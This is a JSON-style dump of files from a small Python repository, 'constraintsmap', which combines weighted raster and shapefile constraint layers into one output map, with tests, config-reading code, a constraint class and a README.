"blob_id": "ebfb53671a2b832a89f2279921dcf9f76ee8e07b", "content_id": "b17ce48fffb566230200eefb146198c347a4446c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 541, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/constraintsmap/tests/read_test.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom constraintsmap.common.config import read_config, read_constraints\n\n\ndef test_init():\n ''' should pass '''\n assert 1 == 1\n\n\ndef test_read_config():\n config = read_config('./constraintsmap/tests/config.json')\n assert config != None\n assert config.save_location == '/tests/'\n\n\ndef test_read_constraints():\n constraints = read_constraints('./constraintsmap/tests/constraints.json')\n assert constraints != None\n" }, { "alpha_fraction": 0.49751242995262146, "alphanum_fraction": 0.5621890425682068, "avg_line_length": 32.36666488647461, "blob_id": "97b57f021e6959470340f85b4b18e937cafd22c8", "content_id": "6937366dac1b2e4a419e4d1403a4aa12d9bb67e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1005, "license_type": "no_license", "max_line_length": 74, "num_lines": 30, "path": "/constraintsmap/tests/constraint_test.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom constraintsmap.constraint.operation import Operation\nimport numpy as np\nfrom numpy.linalg import multi_dot\n\n\ndef test_can_add():\n op = Operation()\n first = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n second = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n result = op.execute(first, second)\n assert np.all([result[0], [2, 2, 2, 2]])\n\n\ndef test_weighted_sum():\n first = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n weight = 4\n result = first * weight\n assert np.all([result[0], [4, 4, 4, 4]])\n\n\ndef test_weighted_sums():\n first = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n second = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n weights = [4, 5]\n weighted_sum = [a * weights[i] for i, a in enumerate([first, second])]\n result = Operation().execute(weighted_sum[0], weighted_sum[1])\n assert np.all([result[0], [4, 4, 4, 4]])\n assert np.all([result[1], [5, 5, 5, 5]]) \n" }, { "alpha_fraction": 0.6735484004020691, "alphanum_fraction": 0.6787096858024597, "avg_line_length": 28.245283126831055, "blob_id": "de2e1ec2ffbbc271eb6cc5fb37c13dc4b0d70d5a", "content_id": "1bd076c3b61c1db096761059dec4396210488147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1550, "license_type": "no_license", "max_line_length": 122, "num_lines": 53, "path": "/constraintsmap/common/config.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import imageio\nimport json\nimport jsons\nimport numpy as np\nfrom dataclasses import dataclass\nfrom typing import Optional, Union\n\nfrom constraintsmap.geo.buffer import BufferConstraint\nfrom constraintsmap.constraint.constraints import Constraint, MultiConstraint\n\n\n@dataclass\nclass ConstraintsConfig:\n save_location: str\n output_location: str\n scale: bool = False\n scale_min: int = 0\n scale_max: int = 100\n round: bool = False\n\n\ndef read_constraints(constraint_json):\n with open(constraint_json) as file:\n c_json = json.load(file, encoding='utf8')\n constraints = [jsons.load(c, Union[Constraint, BufferConstraint, MultiConstraint]) for c in c_json['constraints']]\n return constraints\n\n\ndef read_layers():\n constraints = read_constraints()\n weighted_sum = sorted([(c.weight, c.sort_order) for c in constraints],\n key=lambda x: x[1])\n con_arrays = sorted([(c.image, c.sort_order) for c in constraints],\n key=lambda x: x[1])\n # np.dot(a,weights) but with multiple\n return np.linalg.multi_dot(con_arrays, weighted_sum)\n\n\ndef write_output(img_array, output_path):\n imageio.imwrite(output_path, img_array)\n\n\ndef read_config(path='./config.json'):\n config = None\n with open(path) as file:\n try:\n dict_config = json.load(file, encoding='utf8')\n config = jsons.load(dict_config, ConstraintsConfig)\n except FileNotFoundError:\n print(path + \" not found. \")\n except ValueError:\n print(\"parse error\")\n return config\n" }, { "alpha_fraction": 0.8075060248374939, "alphanum_fraction": 0.8075060248374939, "avg_line_length": 36.59090805053711, "blob_id": "322749a899d7c28f073ee04390df203e91435f44", "content_id": "d2ac86de460239b6db5fdd1d112be12e1afbff5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 826, "license_type": "no_license", "max_line_length": 86, "num_lines": 22, "path": "/README.md", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "# Constraints Map\n\nTake a series of layers/constraints and align to a given weighting to \ncombine for an overall constrained output.\nBusically munge together layers with weights for an output.\nEach layer/constraint can have an operation applied e.g. min/max, +/-, multiple, gate\n\nConstraints json\n\nEach constraint layer can be input via a json file.\n\nGeo\n\nAllows constraints layers to be added in shape file format as vectors.\nConstraint operators (e.g. Buffer) can be applied to points/lines/polygons before\nbeing included in the constraints matrix.\n\nConstraint-linking\n\nConstraints can be included based upon the relationship with another constraint-layer.\nFor example: add a layer based upon the intersection of another constraint-layer.\nEach constraint layer is given a unique id which can be linked when creating another." }, { "alpha_fraction": 0.6164267659187317, "alphanum_fraction": 0.6189669966697693, "avg_line_length": 30.91891860961914, "blob_id": "94b8c9313da570bfe265844d10af60912ee7f0ee", "content_id": "5fce4f635c4c7c248e898c443b718d6a1af89063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 96, "num_lines": 37, "path": "/constraintsmap/constraint/constraints.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import uuid\nimport glob\nimport imageio\nfrom .operation import Operation, SubtractOperation, RoundOperation, MinOperation, MaxOperation\n\n\nclass Constraint:\n constraint_op = None\n\n def __init__(self, name, img_array, operation, operation_props, sort_order=0, weight=1):\n self.id = str(uuid.uuid4())\n self.name = name\n self.img_array = img_array\n self.sort_order = sort_order\n self.weight = weight\n self.operation = operation\n self.operation_props = operation_props\n ops = {\n 'add': Operation(),\n 'subtract': SubtractOperation(),\n 'round': RoundOperation(),\n 'min': MinOperation(**operation_props),\n 'max': MaxOperation(**operation_props)\n }\n self.constraint_op = ops[operation.lower()] if operation.lower() in ops else Operation()\n\n\nclass MultiConstraint(Constraint):\n # like a single constraint but for a directory/path\n\n def __init__(self, path):\n self.path = path\n\n def execute(self):\n for image_path in glob.glob(\"/home/adam/*.png\"):\n im = imageio.imread('my_image.png')\n self.constraint_op.execute(im)\n" }, { "alpha_fraction": 0.6599634289741516, "alphanum_fraction": 0.6819012761116028, "avg_line_length": 29.38888931274414, "blob_id": "08426cce7b5d7079b7973c1edb09c1f11ead70d9", "content_id": "eabe5f6ce3b07d80b88a59c107e587fda02f2713", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 547, "license_type": "no_license", "max_line_length": 102, "num_lines": 18, "path": "/constraintsmap/tests/raster_test.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom constraintsmap.geo.raster import to_raster_array\nfrom constraintsmap.geo.buffer import BufferConstraint\n\n\n# def test_init():\n# ''' should pass '''\n# assert 1 == 1\n\ndef test_to_raster_array():\n geo = BufferConstraint.init_create_geometry('constrainstmap/tests/data/State_Fairgrounds.shp', 10)\n ras_arr = to_raster_array(geo, 100, 100)\n assert ras_arr is not None\n\n\ndef test_to_raster_writes_file():\n assert 1 == 1\n" } ]
11
nindyahapsari/ecommerce_scraping
https://github.com/nindyahapsari/ecommerce_scraping
b068f8eabd4f3a274f64564467f2d621261a84e6
25602803f0e05a1d1e5f7d677dd87459f4fb2964
c6e7892b19bc689530188545a6770536c798be5d
refs/heads/master
2020-03-27T00:21:02.532341
2018-08-22T00:06:19
2018-08-22T00:12:25
145,615,381
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8151260614395142, "alphanum_fraction": 0.8151260614395142, "avg_line_length": 28.75, "blob_id": "cf099bc9f328e5aeca78f73dbb757f7a9084464c", "content_id": "d6695ef3068ac4e435b6131cd60c673b0e088329", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 119, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/README.md", "repo_name": "nindyahapsari/ecommerce_scraping", "src_encoding": "UTF-8", "text": "# ecommerce_scraping\nPython script for web scraping ecommerce website\n\nUsing : Python, Pandas, BeautifulSoup, Requests\n" }, { "alpha_fraction": 0.6278882026672363, "alphanum_fraction": 0.6380978226661682, "avg_line_length": 30.811965942382812, "blob_id": "1a635a2a6f3e92a8c4abe9f16a6e7c4cecd90a1c", "content_id": "8515e43ee036f78684647b9fc251715e9b170abc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3722, "license_type": "no_license", "max_line_length": 181, "num_lines": 117, "path": "/scraping_data.py", "repo_name": "nindyahapsari/ecommerce_scraping", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n#Python 2.7\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport csv\n\n\nurl = 'https://www.vistaprint.com/business-cards?txi=18264&xnid=AllProductsPage_Business+cards_All+Products&xnav=AllProductsPage&GP=08%2f21%2f2018+14%3a52%3a04&GPS=5146966587&GNF=0'\ncardsurl = requests.get(url)\nsoup = BeautifulSoup(cardsurl.content, 'lxml')\n\n# div tag for the steps of creating bussiness cards\ndiv = soup.find(\"div\", {\"class\" : \"grid-container grid-container-line-wrap\"})\n\n\n# GETTING ALL INFORMATION FROM THE PRODUCTS\n\n# BANNER TAGS\nbanner_tag = div.find_all(\"strong\")\njust_banner = [banner.get_text().strip() for banner in banner_tag]\n\n\n\nname_tag = div.find_all(\"p\", class_=\"standard-product-tile-name\")\njust_name = [ name.get_text().strip() for name in name_tag]\n\ndescription_tag = div.find_all(\"div\", class_=\"standard-product-tile-description\")\njust_descriptions = [des.get_text().strip() for des in description_tag]\n\npricing_tag = div.find_all(\"div\", class_=\"standard-product-tile-pricing\")\njust_pricing = [price.get_text().strip() for price in pricing_tag]\n\nnormal_tag = div.find_all(class_=\"comparative-list-price\")\njust_normal = [normal.get_text().strip() for normal in normal_tag]\n\ndiscount_tag = div.find_all(class_=\"discount-price\")\njust_discount = [discount.get_text().strip() for discount in discount_tag]\n\n\n\n# print(just_banner)\n# print(\"-------------------------------------\")\n# print(just_name)\n# print(\"-------------------------------------\")\n# print(just_descriptions)\n# print(\"-------------------------------------\")\n# print(just_pricing)\n# print(\"-------------------------------------\")\n# print(just_normal)\n# print(\"-------------------------------------\")\n# print(just_discount)\n\n\n\n\nprint(\"___________________________________________________________________________\")\n\nbusinesscards = ({\n\n\t\t\t\"name\" \t\t\t: just_name,\n\t\t\t\"description\" \t: just_descriptions,\n\t\t\t\"pricing\" \t\t: just_pricing,\n\t\t\t\"normal\" \t\t: just_normal,\n\t\t\t\"discount\" \t\t: just_discount\n\t\t\t})\n\n# BCS ARRAYS IS NOT IN THE SAME LENGTH\ndf = pd.DataFrame.from_dict(businesscards, orient='index')\ndf_result = df.transpose()\n\n# REORDERING COLOUMNS\nlabel_arr = df_result[[ 'name', 'description', 'pricing', 'normal', 'discount' ]]\n\nprint(label_arr)\n\nlabel_arr.to_csv('bussiness_card_list_final.csv', index_label=None )\n\n\n\n\n\n################################################################################\n# SHAPE FOR THE BUSSINESS CARDS\n# steps of shaping the bussiness cards\n# from HTML file\n# row = index[0]\n\n\n# row = div.find_all(\"div\", class_=\"row\")\n\n# tile_name = row.find(class_=\"standard-product-tile-name\").get_text().strip()\n# tile_des = row.find(class_=\"standard-product-tile-description\").get_text().strip()\n# tile_pricing = row.find(\"div\", class_=\"standard-product-tile-pricing\").get_text().strip()\n# tile_normal = row.find(class_=\"comparative-list-price\").get_text()\n# tile_discount = row.find(class_=\"discount-price\").get_text()\n\n# print(tile_name)\n# print(tile_des)\n# print(tile_pricing)\n# print(tile_normal)\n# print(tile_discount)\n\n# FINDING ALL THE FIRST PRODUCTS IN LIST COMPREHENSION\n# names \t\t\t= [name.get_text().strip() for name in row.select(\".standard-product-tile-name\") ]\n# descriptions \t\t= [des.get_text().strip() for des in row.find_all(class_=\"standard-product-tile-description\") ]\n# pricings \t\t\t= [price.get_text().strip() for price in row.find_all(class_=\"standard-product-tile-pricing\") ]\n# normals \t\t\t= [normal.get_text().strip() for normal in row.find_all(class_=\"comparative-list-price\") ]\n# discounts \t\t= [discount.get_text().strip() for discount in row.find_all(class_=\"discount-price\") ]\n\n# print(names)\n# print(descriptions)\n# print(pricings)\n# print(normals)\n# print(discounts)\n" } ]
2
shriya246/Python-Internship
https://github.com/shriya246/Python-Internship
4e4f99ab5cee92430d514f5465dc6bbe47533da4
3826cfecfaadf5e9f68a5a98368ec7b10cbf95dd
49aba32885acc771ee717f6b3a25d98a3058bc79
refs/heads/main
2023-06-08T14:28:11.684860
2021-06-29T13:38:54
2021-06-29T13:38:54
372,826,060
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.49473685026168823, "alphanum_fraction": 0.5473684072494507, "avg_line_length": 14.166666984558105, "blob_id": "e19a7a5085d3afb5c1dc62272bcf1eac64d24cb7", "content_id": "f1bfd6fb7ef838440d018e6fded8f6da52e415b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/Day2task2.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a=20\r\nb=20.5\r\nc=\"Akash Technolabs\"\r\nprint(a)\r\nprint(\"Value of b is : \", b)\r\nprint(\"ompany name is : \", c)" }, { "alpha_fraction": 0.5490848422050476, "alphanum_fraction": 0.580199658870697, "avg_line_length": 21.204633712768555, "blob_id": "6d1005b88d3e99886cfc9773aa22dd0417916b31", "content_id": "d84a0bf2189ce859cae77a46a5a996765c2e8fbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6010, "license_type": "no_license", "max_line_length": 75, "num_lines": 259, "path": "/Day5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#class\r\n'''class demo:\r\n def myFunction(self):\r\n print(\"This is myFunctionof class... \")\r\n def show(self,name):\r\n print(\"Value is\",name)\r\nd1=demo()\r\nd1.myFunction()\r\nd1.show(\"Shriya\")'''\r\n\r\n#EXAMPLE\r\n'''class Myclass:\r\n def func1(self):\r\n print('Hello')\r\n def func2(self,name):\r\n print('Name is : '+name)\r\n#create a object of Myclass\r\nmyc = Myclass()\r\n#calling function\r\nmyc.func1()\r\nmyc.func2(\"Amazon\")'''\r\n\r\n#sum of 2 number using class\r\n'''class Myclass:\r\n def func1(self,n1,n2):\r\n ans=n1+n2\r\n print('Ans is : ',ans)\r\n#creat a object of Myclass\r\nmyc = Myclass()\r\n#calling function\r\nmyc.func1(20,30)'''\r\n\r\n#python constructors\r\n'''class demo:\r\n def myFunction(self):\r\n print(\"This is myFunctionof class...\")\r\n def show(self,name):\r\n print(\"Value is \",name)\r\n def __init__(self,nm):\r\n print(\"This is demo class...\")\r\n print(\"Name is \",nm)\r\nd1=demo(\"xyz\")\r\nd1.myFunction()\r\nd1.show(\"Shriya\")'''\r\n\r\n#assign string value to class variable using method\r\n'''class Demo:\r\n name=\"\"\r\n def func1(self):\r\n print(\"This is normal method...\")\r\n def func2(self,name):\r\n self.name=name\r\n def show(self):\r\n print(\"Name is \",self.name)\r\nd1=Demo()\r\nd1.func1()\r\nd1.func2(\"Shriya\")\r\nd1.show()'''\r\n\r\n#example\r\n'''class Myclass:\r\n name=\"\"\r\n def func1(self):\r\n print(\"Hello Function1\")\r\n def func2(self,name):\r\n self.name=name\r\n def func3(self):\r\n print(\"Value is \",self.name)\r\nm1=Myclass()\r\nm1.func1()\r\nm1.func2(\"Shriya\")\r\nm1.func3()'''\r\n\r\n#assign string value to class variable using constructor\r\n'''class Myclass:\r\n name= \"\"\r\n def __init__(self,name):\r\n self.name = name\r\n def func1(self):\r\n print(\"Name is : \", self.name)\r\nmyc = Myclass(\"Shriya Patel\")''' \r\n\r\n#Example\r\n'''class Myclass:\r\n n1=0\r\n n2=0\r\n\r\n #constructor\r\n\r\n def __init__(self,n1,n2):\r\n self.n1=n1\r\n self.n2=n2\r\n\r\n #Function\r\n def func1(self):\r\n ans=self.n1+self.n2\r\n print('Ans is :',ans)\r\n\r\n#create a object of MyClass\r\nmyc=Myclass(10,20)\r\n\r\n#Calling Function\r\nmyc.func1()'''\r\n\r\n#single level inheritance\r\n'''class Demo:\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def func2(self):\r\n print(\"This is child class method\")\r\nd1=Demo1()\r\nd1.func1()\r\nd1.func2()'''\r\n\r\n#parent & child\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nd1=Demo1()\r\nd1.func1()\r\nd1.func2()'''\r\n\r\n#multi level inheritance\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nclass Demo2(Demo1):\r\n def func3(self):\r\n print(\"This is child method of Demo2 class...\") \r\nd1=Demo2()\r\nd1.func1()\r\nd1.func2()\r\nd1.func3()'''\r\n\r\n#multiple inheritance\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1:\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nclass Demo2(Demo,Demo1):\r\n def func3(self):\r\n print(\"This is child method of Demo2 class...\") \r\nd1=Demo2()\r\nd1.func1()\r\nd1.func2()\r\nd1.func3()'''\r\n\r\n#hierarchical inheritance\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nclass Demo2(Demo):\r\n def func3(self):\r\n print(\"This is child method of Demo2 class...\") \r\nd1=Demo1()\r\nd1.func1()\r\nd1.func2()\r\n\r\nd2=Demo2()\r\nd2.func1()\r\nd2.func3()'''\r\n\r\n#hybrid inheritance\r\n#define parent class1\r\n'''class MyParentClass1():\r\n\r\n def method__Parent1(self):\r\n print(\"Parent1 method called\")\r\n\r\n#define parent class2\r\nclass MyParentClass2():\r\n\r\n def method__Parent2(self):\r\n print(\"Parent2 method called\")\r\n\r\n#define Child class\r\nclass ChildClass(MyParentClass1, MyParentClass2): #Multiple Inheritance \r\n \r\n def child_method(self):\r\n print(\"child method\") \r\n\r\n#define Child class2\r\nclass ChildClass(MyParentClass1): #Hierarchical Inherit\r\n#define Child class2\r\nclass ChildClass(MyParentClass1): #Hierarchical Inheritance \r\n def child_method(self):\r\n print(\"child method2\") \r\n\r\nc=ChildClass() #object of child\r\nc.method_Parent1() #parent class1 method\r\nc.method_Parent2() #parent class2 method\r\nc.child_method() #child class method\r\n\r\nc2=ChildClass2() #object of child class 2\r\nc2.child_method() #child class 2 method\r\nc2.method_Parent1() ''' #parent class1 method\r\n\r\n\r\n#overriding\r\n'''class parentclass:\r\n def func1(self):\r\n print(\"Parent method called\")\r\nclass Childrenclass(parentclass):\r\n def func1(self):\r\n print(\"Child method called\")\r\nc=Childrenclass()\r\nc.func1()'''\r\n\r\n#Example2\r\n'''class parentclass:\r\n def func1(self):\r\n print(\"Parent method called\")\r\nclass Childrenclass(parentclass):\r\n def func1(self):\r\n print(\"Child method called\")\r\nc=Childrenclass()\r\nc.func1()\r\nc=parentclass()'''\r\n\r\n#last task\r\n'''class Myclass:\r\n def func1(self,n1,n2):\r\n ans=n1+n2\r\n print(\"Ans is :\",ans)\r\n def func1(self,n1,n2,n3):\r\n ans=n1+n2+n3\r\n print(\"Ans is :\",ans)\r\n \r\na=Myclass()\r\n#a.func1(14,78)\r\na.func1(10,20,30)'''\r\n" }, { "alpha_fraction": 0.39615383744239807, "alphanum_fraction": 0.5615384578704834, "avg_line_length": 16.714284896850586, "blob_id": "717b561ab5f1478cae2313c659dbaee4e4411876", "content_id": "a39cd3ea0a764ad1105f42616a73ccf6a0312c7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/Day2task10.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "l1=[10,20,30.5,'Shriya']\r\nprint(l1)\r\nprint(type(l1))\r\nprint(l1[1])\r\nprint(l1 [1:3])\r\nprint (l1[2])\r\nprint (l1[:3])\r\nl1 = (10, 20, 30, \"Akash\", 40, 50, \"Technolabs\", 60)\r\nprint(l1)\r\nprint (l1[2])\r\nprint(l1[0:3])\r\nprint (l1 [5:])\r\nprint (l1[:3])\r\nprint(type(l1))" }, { "alpha_fraction": 0.5596330165863037, "alphanum_fraction": 0.5596330165863037, "avg_line_length": 19.799999237060547, "blob_id": "a1f4bae9c0d467de11b0e925d1ffb1bb11e4c766", "content_id": "aea2a8c81e3991f709cc77e3041e07a60d643d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 109, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/Day4task7.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def myfunction(**arg):\r\n for i,j in arg.items():\r\n print(j)\r\n\r\nmyfunction(name=\"Maki\", nm=\"Yuta\")\r\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.6206896305084229, "avg_line_length": 17.66666603088379, "blob_id": "c01c65ecbdbf7be6592a058033eb0e0c71a668fb", "content_id": "ddd0bb6084afc313990a1f8070889f97a57040f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 37, "num_lines": 6, "path": "/Day4task9.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def my_func():\r\n x=10\r\n print(\"Value inside function:\",x)\r\nx=20\r\nmy_func()\r\nprint(\"Value outside function:\",x)" }, { "alpha_fraction": 0.4430379867553711, "alphanum_fraction": 0.49367088079452515, "avg_line_length": 18.25, "blob_id": "0640ac61cf9f2b448b5d786cdd1465a06072ae20", "content_id": "c36e24badf64d4655bf4d6f9d275323a136acbd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/Day3task14.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "for x in range(10):\r\n if x%2==0:\r\n continue\r\n print(\"Value is:\",x)" }, { "alpha_fraction": 0.7033898234367371, "alphanum_fraction": 0.7033898234367371, "avg_line_length": 37.33333206176758, "blob_id": "d3ed2679c216917047ea34a7a5a2483d76e54c2f", "content_id": "30665f8905fcb901abdee3bd0d2a6da1ea8e2c58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/Day2task1.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "print(\"Hello World\")\r\n'''This is example of multi-line comments'''\r\n\"\"\"This is also example of multiline comments\"\"\"\r\n" }, { "alpha_fraction": 0.37719297409057617, "alphanum_fraction": 0.4912280738353729, "avg_line_length": 14.571428298950195, "blob_id": "581f48a3502d07cb4951c4432e2b22398d141338", "content_id": "9b5f0b6ef0a353b646567cdfbbf0bbf9e2d6a4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 24, "num_lines": 7, "path": "/Day4task6.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def sum(*n1):\r\n sum=0\r\n for i in n1:\r\n sum=sum+i\r\n print(\"Ans is \",sum)\r\nsum(10,20)\r\nsum(10,20,30)" }, { "alpha_fraction": 0.45945945382118225, "alphanum_fraction": 0.5675675868988037, "avg_line_length": 10.333333015441895, "blob_id": "2477af2b2a87bb50b2bb35fde1e6b10592c41215", "content_id": "67787ee4823d296e029cda1bd05506493329209e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 26, "num_lines": 9, "path": "/Day3task2.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#IF STATEMENT\r\n\r\nn1=20\r\nn2=30\r\nif n1>n2:\r\n print(\"n1 is greater\")\r\n\r\nif n1<n2:\r\n print(\"n2 is greater\")\r\n" }, { "alpha_fraction": 0.4811320900917053, "alphanum_fraction": 0.5, "avg_line_length": 24.5, "blob_id": "afe3e098074d991c6883915b6062a58c115318d4", "content_id": "703764c7880e2398eff79f2cb5d4246f3e4b3287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 106, "license_type": "no_license", "max_line_length": 28, "num_lines": 4, "path": "/Day2task5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a = b = c = 10\r\nprint(\"Value of a is : \", a)\r\nprint(\"Value of b is : \", b)\r\nprint(\"Value of c is : \", c)\r\n" }, { "alpha_fraction": 0.38793104887008667, "alphanum_fraction": 0.4913793206214905, "avg_line_length": 14.571428298950195, "blob_id": "0ac4f8f5e6fa222028e9cf20cfbaf4d2c42bb60d", "content_id": "8ba98ccc9476d3d79997652e59fad6fbc6739907", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/Day4task8.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def add(*num):\r\n sum=0\r\n for n in num:\r\n sum=sum+n\r\n print(\"Sum:\",sum)\r\nadd(120,30)\r\nadd(23,12,45)\r\n" }, { "alpha_fraction": 0.5420560836791992, "alphanum_fraction": 0.5887850522994995, "avg_line_length": 25.25, "blob_id": "63cf5b0835d738782ea70cf5931bcd395896e509", "content_id": "06b9958a3c01e6eb187893a6144c1031006e17b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 107, "license_type": "no_license", "max_line_length": 35, "num_lines": 4, "path": "/Day2task4.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a,b,c = 15, 15.5, \"Akash Technolab\"\r\nprint(a)\r\nprint(\"Value of b is : \", b)\r\nprint(\"Company name is : \", c)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5909090638160706, "avg_line_length": 10.44444465637207, "blob_id": "9370a148b388438432498c7d106d78738d66c3b3", "content_id": "26a3134d65b500c4744a506c7a69b12d888e2ef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 26, "num_lines": 9, "path": "/Day3task3.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#IF ELSE STATEMENT\r\n\r\nn1=20\r\nn2=30\r\nif n1>n2:\r\n print(\"n1 is greater\")\r\n\r\nelse:\r\n print(\"n2 is greater\")" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 24.799999237060547, "blob_id": "4a0c4072f835181d1d81037de5ce90e0cd6c7c92", "content_id": "0c76c84687d2abf57b4f88c6274c0eb6d1ee0b15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/Day2task3.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "name=\"Shriya Patel\"\r\nprint(\"Name is : \", name)\r\n#assigning a new value to website\r\nname=\"Asmita Chowdhury.com\" \r\nprint(\"Name is : \", name)" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 18.200000762939453, "blob_id": "a8d849ca7302a3a12f60d8e28c4aece81ebb9acd", "content_id": "3c93033d930b0d3e16571568e22065447bc1ee66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/Day4task1.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def myfunction(name):\r\n print(\"Hello World\")\r\n print(\"Name is:\",name)\r\n\r\nmyfunction(\"Shriya\")" }, { "alpha_fraction": 0.5149253606796265, "alphanum_fraction": 0.5671641826629639, "avg_line_length": 25.200000762939453, "blob_id": "529664d74ff035e6802683222627980fa772c6e2", "content_id": "1d9e7954c3c8c9c3b86b31fcfac7caad8dbeac6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/Day3task12.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "list1 = [10, 20, \"Netflix\"]\r\nfor i in range(len(list1)):\r\n print('Value is :', list1[i])\r\nelse:\r\n print(\"No elements left.\")" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5980392098426819, 